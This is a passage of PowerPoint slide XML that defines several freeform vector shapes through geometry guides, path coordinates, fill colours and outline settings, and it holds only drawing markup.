                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36099" name="Freeform 232"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2937" y="2288"/>
                <a:ext cx="48" cy="29"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 39 w 48"/>
                  <a:gd name="T1" fmla="*/ 29 h 29"/>
                  <a:gd name="T2" fmla="*/ 34 w 48"/>
                  <a:gd name="T3" fmla="*/ 28 h 29"/>
                  <a:gd name="T4" fmla="*/ 28 w 48"/>
                  <a:gd name="T5" fmla="*/ 23 h 29"/>
                  <a:gd name="T6" fmla="*/ 22 w 48"/>
                  <a:gd name="T7" fmla="*/ 21 h 29"/>
                  <a:gd name="T8" fmla="*/ 9 w 48"/>
                  <a:gd name="T9" fmla="*/ 14 h 29"/>
                  <a:gd name="T10" fmla="*/ 3 w 48"/>
                  <a:gd name="T11" fmla="*/ 12 h 29"/>
                  <a:gd name="T12" fmla="*/ 1 w 48"/>
                  <a:gd name="T13" fmla="*/ 11 h 29"/>
                  <a:gd name="T14" fmla="*/ 0 w 48"/>
                  <a:gd name="T15" fmla="*/ 9 h 29"/>
                  <a:gd name="T16" fmla="*/ 1 w 48"/>
                  <a:gd name="T17" fmla="*/ 6 h 29"/>
                  <a:gd name="T18" fmla="*/ 3 w 48"/>
                  <a:gd name="T19" fmla="*/ 3 h 29"/>
                  <a:gd name="T20" fmla="*/ 5 w 48"/>
                  <a:gd name="T21" fmla="*/ 2 h 29"/>
                  <a:gd name="T22" fmla="*/ 9 w 48"/>
                  <a:gd name="T23" fmla="*/ 3 h 29"/>
                  <a:gd name="T24" fmla="*/ 14 w 48"/>
                  <a:gd name="T25" fmla="*/ 0 h 29"/>
                  <a:gd name="T26" fmla="*/ 18 w 48"/>
                  <a:gd name="T27" fmla="*/ 3 h 29"/>
                  <a:gd name="T28" fmla="*/ 21 w 48"/>
                  <a:gd name="T29" fmla="*/ 5 h 29"/>
                  <a:gd name="T30" fmla="*/ 26 w 48"/>
                  <a:gd name="T31" fmla="*/ 5 h 29"/>
                  <a:gd name="T32" fmla="*/ 36 w 48"/>
                  <a:gd name="T33" fmla="*/ 3 h 29"/>
                  <a:gd name="T34" fmla="*/ 46 w 48"/>
                  <a:gd name="T35" fmla="*/ 0 h 29"/>
                  <a:gd name="T36" fmla="*/ 47 w 48"/>
                  <a:gd name="T37" fmla="*/ 1 h 29"/>
                  <a:gd name="T38" fmla="*/ 48 w 48"/>
                  <a:gd name="T39" fmla="*/ 2 h 29"/>
                  <a:gd name="T40" fmla="*/ 47 w 48"/>
                  <a:gd name="T41" fmla="*/ 3 h 29"/>
                  <a:gd name="T42" fmla="*/ 43 w 48"/>
                  <a:gd name="T43" fmla="*/ 10 h 29"/>
                  <a:gd name="T44" fmla="*/ 42 w 48"/>
                  <a:gd name="T45" fmla="*/ 15 h 29"/>
                  <a:gd name="T46" fmla="*/ 42 w 48"/>
                  <a:gd name="T47" fmla="*/ 18 h 29"/>
                  <a:gd name="T48" fmla="*/ 45 w 48"/>
                  <a:gd name="T49" fmla="*/ 23 h 29"/>
                  <a:gd name="T50" fmla="*/ 44 w 48"/>
                  <a:gd name="T51" fmla="*/ 24 h 29"/>
                  <a:gd name="T52" fmla="*/ 41 w 48"/>
                  <a:gd name="T53" fmla="*/ 29 h 29"/>
                  <a:gd name="T54" fmla="*/ 39 w 48"/>
                  <a:gd name="T55" fmla="*/ 29 h 29"/>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48"/>
                  <a:gd name="T85" fmla="*/ 0 h 29"/>
                  <a:gd name="T86" fmla="*/ 48 w 48"/>
                  <a:gd name="T87" fmla="*/ 29 h 29"/>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48" h="29">
                    <a:moveTo>
                      <a:pt x="39" y="29"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="34" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="29"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36100" name="Freeform 233"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2476" y="2742"/>
                <a:ext cx="46" cy="25"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 46"/>
                  <a:gd name="T1" fmla="*/ 5 h 25"/>
                  <a:gd name="T2" fmla="*/ 4 w 46"/>
                  <a:gd name="T3" fmla="*/ 4 h 25"/>
                  <a:gd name="T4" fmla="*/ 9 w 46"/>
                  <a:gd name="T5" fmla="*/ 4 h 25"/>
                  <a:gd name="T6" fmla="*/ 15 w 46"/>
                  <a:gd name="T7" fmla="*/ 4 h 25"/>
                  <a:gd name="T8" fmla="*/ 18 w 46"/>
                  <a:gd name="T9" fmla="*/ 3 h 25"/>
                  <a:gd name="T10" fmla="*/ 22 w 46"/>
                  <a:gd name="T11" fmla="*/ 0 h 25"/>
                  <a:gd name="T12" fmla="*/ 29 w 46"/>
                  <a:gd name="T13" fmla="*/ 0 h 25"/>
                  <a:gd name="T14" fmla="*/ 46 w 46"/>
                  <a:gd name="T15" fmla="*/ 0 h 25"/>
                  <a:gd name="T16" fmla="*/ 45 w 46"/>
                  <a:gd name="T17" fmla="*/ 6 h 25"/>
                  <a:gd name="T18" fmla="*/ 46 w 46"/>
                  <a:gd name="T19" fmla="*/ 12 h 25"/>
                  <a:gd name="T20" fmla="*/ 44 w 46"/>
                  <a:gd name="T21" fmla="*/ 14 h 25"/>
                  <a:gd name="T22" fmla="*/ 42 w 46"/>
                  <a:gd name="T23" fmla="*/ 16 h 25"/>
                  <a:gd name="T24" fmla="*/ 38 w 46"/>
                  <a:gd name="T25" fmla="*/ 16 h 25"/>
                  <a:gd name="T26" fmla="*/ 36 w 46"/>
                  <a:gd name="T27" fmla="*/ 16 h 25"/>
                  <a:gd name="T28" fmla="*/ 33 w 46"/>
                  <a:gd name="T29" fmla="*/ 17 h 25"/>
                  <a:gd name="T30" fmla="*/ 27 w 46"/>
                  <a:gd name="T31" fmla="*/ 22 h 25"/>
                  <a:gd name="T32" fmla="*/ 25 w 46"/>
                  <a:gd name="T33" fmla="*/ 25 h 25"/>
                  <a:gd name="T34" fmla="*/ 25 w 46"/>
                  <a:gd name="T35" fmla="*/ 24 h 25"/>
                  <a:gd name="T36" fmla="*/ 23 w 46"/>
                  <a:gd name="T37" fmla="*/ 24 h 25"/>
                  <a:gd name="T38" fmla="*/ 20 w 46"/>
                  <a:gd name="T39" fmla="*/ 23 h 25"/>
                  <a:gd name="T40" fmla="*/ 18 w 46"/>
                  <a:gd name="T41" fmla="*/ 21 h 25"/>
                  <a:gd name="T42" fmla="*/ 19 w 46"/>
                  <a:gd name="T43" fmla="*/ 18 h 25"/>
                  <a:gd name="T44" fmla="*/ 22 w 46"/>
                  <a:gd name="T45" fmla="*/ 15 h 25"/>
                  <a:gd name="T46" fmla="*/ 23 w 46"/>
                  <a:gd name="T47" fmla="*/ 13 h 25"/>
                  <a:gd name="T48" fmla="*/ 23 w 46"/>
                  <a:gd name="T49" fmla="*/ 12 h 25"/>
                  <a:gd name="T50" fmla="*/ 20 w 46"/>
                  <a:gd name="T51" fmla="*/ 11 h 25"/>
                  <a:gd name="T52" fmla="*/ 16 w 46"/>
                  <a:gd name="T53" fmla="*/ 11 h 25"/>
                  <a:gd name="T54" fmla="*/ 13 w 46"/>
                  <a:gd name="T55" fmla="*/ 13 h 25"/>
                  <a:gd name="T56" fmla="*/ 12 w 46"/>
                  <a:gd name="T57" fmla="*/ 13 h 25"/>
                  <a:gd name="T58" fmla="*/ 8 w 46"/>
                  <a:gd name="T59" fmla="*/ 11 h 25"/>
                  <a:gd name="T60" fmla="*/ 5 w 46"/>
                  <a:gd name="T61" fmla="*/ 8 h 25"/>
                  <a:gd name="T62" fmla="*/ 5 w 46"/>
                  <a:gd name="T63" fmla="*/ 7 h 25"/>
                  <a:gd name="T64" fmla="*/ 2 w 46"/>
                  <a:gd name="T65" fmla="*/ 6 h 25"/>
                  <a:gd name="T66" fmla="*/ 0 w 46"/>
                  <a:gd name="T67" fmla="*/ 5 h 25"/>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46"/>
                  <a:gd name="T103" fmla="*/ 0 h 25"/>
                  <a:gd name="T104" fmla="*/ 46 w 46"/>
                  <a:gd name="T105" fmla="*/ 25 h 25"/>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46" h="25">
                    <a:moveTo>
                      <a:pt x="0" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36101" name="Freeform 234"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2476" y="2742"/>
                <a:ext cx="46" cy="25"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 46"/>
                  <a:gd name="T1" fmla="*/ 5 h 25"/>
                  <a:gd name="T2" fmla="*/ 4 w 46"/>
                  <a:gd name="T3" fmla="*/ 4 h 25"/>
                  <a:gd name="T4" fmla="*/ 9 w 46"/>
                  <a:gd name="T5" fmla="*/ 4 h 25"/>
                  <a:gd name="T6" fmla="*/ 15 w 46"/>
                  <a:gd name="T7" fmla="*/ 4 h 25"/>
                  <a:gd name="T8" fmla="*/ 18 w 46"/>
                  <a:gd name="T9" fmla="*/ 3 h 25"/>
                  <a:gd name="T10" fmla="*/ 22 w 46"/>
                  <a:gd name="T11" fmla="*/ 0 h 25"/>
                  <a:gd name="T12" fmla="*/ 29 w 46"/>
                  <a:gd name="T13" fmla="*/ 0 h 25"/>
                  <a:gd name="T14" fmla="*/ 46 w 46"/>
                  <a:gd name="T15" fmla="*/ 0 h 25"/>
                  <a:gd name="T16" fmla="*/ 45 w 46"/>
                  <a:gd name="T17" fmla="*/ 6 h 25"/>
                  <a:gd name="T18" fmla="*/ 46 w 46"/>
                  <a:gd name="T19" fmla="*/ 12 h 25"/>
                  <a:gd name="T20" fmla="*/ 44 w 46"/>
                  <a:gd name="T21" fmla="*/ 14 h 25"/>
                  <a:gd name="T22" fmla="*/ 42 w 46"/>
                  <a:gd name="T23" fmla="*/ 16 h 25"/>
                  <a:gd name="T24" fmla="*/ 38 w 46"/>
                  <a:gd name="T25" fmla="*/ 16 h 25"/>
                  <a:gd name="T26" fmla="*/ 36 w 46"/>
                  <a:gd name="T27" fmla="*/ 16 h 25"/>
                  <a:gd name="T28" fmla="*/ 33 w 46"/>
                  <a:gd name="T29" fmla="*/ 17 h 25"/>
                  <a:gd name="T30" fmla="*/ 27 w 46"/>
                  <a:gd name="T31" fmla="*/ 22 h 25"/>
                  <a:gd name="T32" fmla="*/ 25 w 46"/>
                  <a:gd name="T33" fmla="*/ 25 h 25"/>
                  <a:gd name="T34" fmla="*/ 25 w 46"/>
                  <a:gd name="T35" fmla="*/ 24 h 25"/>
                  <a:gd name="T36" fmla="*/ 23 w 46"/>
                  <a:gd name="T37" fmla="*/ 24 h 25"/>
                  <a:gd name="T38" fmla="*/ 20 w 46"/>
                  <a:gd name="T39" fmla="*/ 23 h 25"/>
                  <a:gd name="T40" fmla="*/ 18 w 46"/>
                  <a:gd name="T41" fmla="*/ 21 h 25"/>
                  <a:gd name="T42" fmla="*/ 19 w 46"/>
                  <a:gd name="T43" fmla="*/ 18 h 25"/>
                  <a:gd name="T44" fmla="*/ 22 w 46"/>
                  <a:gd name="T45" fmla="*/ 15 h 25"/>
                  <a:gd name="T46" fmla="*/ 23 w 46"/>
                  <a:gd name="T47" fmla="*/ 13 h 25"/>
                  <a:gd name="T48" fmla="*/ 23 w 46"/>
                  <a:gd name="T49" fmla="*/ 12 h 25"/>
                  <a:gd name="T50" fmla="*/ 20 w 46"/>
                  <a:gd name="T51" fmla="*/ 11 h 25"/>
                  <a:gd name="T52" fmla="*/ 16 w 46"/>
                  <a:gd name="T53" fmla="*/ 11 h 25"/>
                  <a:gd name="T54" fmla="*/ 13 w 46"/>
                  <a:gd name="T55" fmla="*/ 13 h 25"/>
                  <a:gd name="T56" fmla="*/ 12 w 46"/>
                  <a:gd name="T57" fmla="*/ 13 h 25"/>
                  <a:gd name="T58" fmla="*/ 8 w 46"/>
                  <a:gd name="T59" fmla="*/ 11 h 25"/>
                  <a:gd name="T60" fmla="*/ 5 w 46"/>
                  <a:gd name="T61" fmla="*/ 8 h 25"/>
                  <a:gd name="T62" fmla="*/ 5 w 46"/>
                  <a:gd name="T63" fmla="*/ 7 h 25"/>
                  <a:gd name="T64" fmla="*/ 2 w 46"/>
                  <a:gd name="T65" fmla="*/ 6 h 25"/>
                  <a:gd name="T66" fmla="*/ 0 w 46"/>
                  <a:gd name="T67" fmla="*/ 5 h 25"/>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46"/>
                  <a:gd name="T103" fmla="*/ 0 h 25"/>
                  <a:gd name="T104" fmla="*/ 46 w 46"/>
                  <a:gd name="T105" fmla="*/ 25 h 25"/>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46" h="25">
                    <a:moveTo>
                      <a:pt x="0" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36102" name="Freeform 235"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3109" y="1764"/>
                <a:ext cx="77" cy="60"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 76 w 77"/>
                  <a:gd name="T1" fmla="*/ 2 h 60"/>
                  <a:gd name="T2" fmla="*/ 76 w 77"/>
                  <a:gd name="T3" fmla="*/ 6 h 60"/>
                  <a:gd name="T4" fmla="*/ 74 w 77"/>
                  <a:gd name="T5" fmla="*/ 7 h 60"/>
                  <a:gd name="T6" fmla="*/ 72 w 77"/>
                  <a:gd name="T7" fmla="*/ 8 h 60"/>
                  <a:gd name="T8" fmla="*/ 71 w 77"/>
                  <a:gd name="T9" fmla="*/ 13 h 60"/>
                  <a:gd name="T10" fmla="*/ 67 w 77"/>
                  <a:gd name="T11" fmla="*/ 18 h 60"/>
                  <a:gd name="T12" fmla="*/ 65 w 77"/>
                  <a:gd name="T13" fmla="*/ 22 h 60"/>
                  <a:gd name="T14" fmla="*/ 66 w 77"/>
                  <a:gd name="T15" fmla="*/ 30 h 60"/>
                  <a:gd name="T16" fmla="*/ 67 w 77"/>
                  <a:gd name="T17" fmla="*/ 35 h 60"/>
                  <a:gd name="T18" fmla="*/ 65 w 77"/>
                  <a:gd name="T19" fmla="*/ 39 h 60"/>
                  <a:gd name="T20" fmla="*/ 68 w 77"/>
                  <a:gd name="T21" fmla="*/ 43 h 60"/>
                  <a:gd name="T22" fmla="*/ 69 w 77"/>
                  <a:gd name="T23" fmla="*/ 45 h 60"/>
                  <a:gd name="T24" fmla="*/ 69 w 77"/>
                  <a:gd name="T25" fmla="*/ 49 h 60"/>
                  <a:gd name="T26" fmla="*/ 71 w 77"/>
                  <a:gd name="T27" fmla="*/ 50 h 60"/>
                  <a:gd name="T28" fmla="*/ 68 w 77"/>
                  <a:gd name="T29" fmla="*/ 51 h 60"/>
                  <a:gd name="T30" fmla="*/ 66 w 77"/>
                  <a:gd name="T31" fmla="*/ 54 h 60"/>
                  <a:gd name="T32" fmla="*/ 65 w 77"/>
                  <a:gd name="T33" fmla="*/ 55 h 60"/>
                  <a:gd name="T34" fmla="*/ 64 w 77"/>
                  <a:gd name="T35" fmla="*/ 58 h 60"/>
                  <a:gd name="T36" fmla="*/ 64 w 77"/>
                  <a:gd name="T37" fmla="*/ 60 h 60"/>
                  <a:gd name="T38" fmla="*/ 62 w 77"/>
                  <a:gd name="T39" fmla="*/ 60 h 60"/>
                  <a:gd name="T40" fmla="*/ 59 w 77"/>
                  <a:gd name="T41" fmla="*/ 59 h 60"/>
                  <a:gd name="T42" fmla="*/ 56 w 77"/>
                  <a:gd name="T43" fmla="*/ 57 h 60"/>
                  <a:gd name="T44" fmla="*/ 54 w 77"/>
                  <a:gd name="T45" fmla="*/ 58 h 60"/>
                  <a:gd name="T46" fmla="*/ 52 w 77"/>
                  <a:gd name="T47" fmla="*/ 60 h 60"/>
                  <a:gd name="T48" fmla="*/ 50 w 77"/>
                  <a:gd name="T49" fmla="*/ 59 h 60"/>
                  <a:gd name="T50" fmla="*/ 48 w 77"/>
                  <a:gd name="T51" fmla="*/ 59 h 60"/>
                  <a:gd name="T52" fmla="*/ 46 w 77"/>
                  <a:gd name="T53" fmla="*/ 55 h 60"/>
                  <a:gd name="T54" fmla="*/ 43 w 77"/>
                  <a:gd name="T55" fmla="*/ 53 h 60"/>
                  <a:gd name="T56" fmla="*/ 41 w 77"/>
                  <a:gd name="T57" fmla="*/ 51 h 60"/>
                  <a:gd name="T58" fmla="*/ 38 w 77"/>
                  <a:gd name="T59" fmla="*/ 49 h 60"/>
                  <a:gd name="T60" fmla="*/ 36 w 77"/>
                  <a:gd name="T61" fmla="*/ 49 h 60"/>
                  <a:gd name="T62" fmla="*/ 33 w 77"/>
                  <a:gd name="T63" fmla="*/ 47 h 60"/>
                  <a:gd name="T64" fmla="*/ 31 w 77"/>
                  <a:gd name="T65" fmla="*/ 44 h 60"/>
                  <a:gd name="T66" fmla="*/ 30 w 77"/>
                  <a:gd name="T67" fmla="*/ 46 h 60"/>
                  <a:gd name="T68" fmla="*/ 29 w 77"/>
                  <a:gd name="T69" fmla="*/ 45 h 60"/>
                  <a:gd name="T70" fmla="*/ 28 w 77"/>
                  <a:gd name="T71" fmla="*/ 44 h 60"/>
                  <a:gd name="T72" fmla="*/ 25 w 77"/>
                  <a:gd name="T73" fmla="*/ 46 h 60"/>
                  <a:gd name="T74" fmla="*/ 23 w 77"/>
                  <a:gd name="T75" fmla="*/ 47 h 60"/>
                  <a:gd name="T76" fmla="*/ 20 w 77"/>
                  <a:gd name="T77" fmla="*/ 48 h 60"/>
                  <a:gd name="T78" fmla="*/ 17 w 77"/>
                  <a:gd name="T79" fmla="*/ 50 h 60"/>
                  <a:gd name="T80" fmla="*/ 18 w 77"/>
                  <a:gd name="T81" fmla="*/ 48 h 60"/>
                  <a:gd name="T82" fmla="*/ 19 w 77"/>
                  <a:gd name="T83" fmla="*/ 40 h 60"/>
                  <a:gd name="T84" fmla="*/ 12 w 77"/>
                  <a:gd name="T85" fmla="*/ 43 h 60"/>
                  <a:gd name="T86" fmla="*/ 6 w 77"/>
                  <a:gd name="T87" fmla="*/ 39 h 60"/>
                  <a:gd name="T88" fmla="*/ 3 w 77"/>
                  <a:gd name="T89" fmla="*/ 28 h 60"/>
                  <a:gd name="T90" fmla="*/ 2 w 77"/>
                  <a:gd name="T91" fmla="*/ 20 h 60"/>
                  <a:gd name="T92" fmla="*/ 2 w 77"/>
                  <a:gd name="T93" fmla="*/ 15 h 60"/>
                  <a:gd name="T94" fmla="*/ 4 w 77"/>
                  <a:gd name="T95" fmla="*/ 11 h 60"/>
                  <a:gd name="T96" fmla="*/ 11 w 77"/>
                  <a:gd name="T97" fmla="*/ 8 h 60"/>
                  <a:gd name="T98" fmla="*/ 16 w 77"/>
                  <a:gd name="T99" fmla="*/ 4 h 60"/>
                  <a:gd name="T100" fmla="*/ 20 w 77"/>
                  <a:gd name="T101" fmla="*/ 4 h 60"/>
                  <a:gd name="T102" fmla="*/ 23 w 77"/>
                  <a:gd name="T103" fmla="*/ 2 h 60"/>
                  <a:gd name="T104" fmla="*/ 34 w 77"/>
                  <a:gd name="T105" fmla="*/ 0 h 60"/>
                  <a:gd name="T106" fmla="*/ 38 w 77"/>
                  <a:gd name="T107" fmla="*/ 1 h 60"/>
                  <a:gd name="T108" fmla="*/ 56 w 77"/>
                  <a:gd name="T109" fmla="*/ 4 h 60"/>
                  <a:gd name="T110" fmla="*/ 63 w 77"/>
                  <a:gd name="T111" fmla="*/ 5 h 60"/>
                  <a:gd name="T112" fmla="*/ 73 w 77"/>
                  <a:gd name="T113" fmla="*/ 5 h 60"/>
                  <a:gd name="T114" fmla="*/ 74 w 77"/>
                  <a:gd name="T115" fmla="*/ 1 h 6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77"/>
                  <a:gd name="T175" fmla="*/ 0 h 60"/>
                  <a:gd name="T176" fmla="*/ 77 w 77"/>
                  <a:gd name="T177" fmla="*/ 60 h 6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77" h="60">
                    <a:moveTo>
                      <a:pt x="74" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="76" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
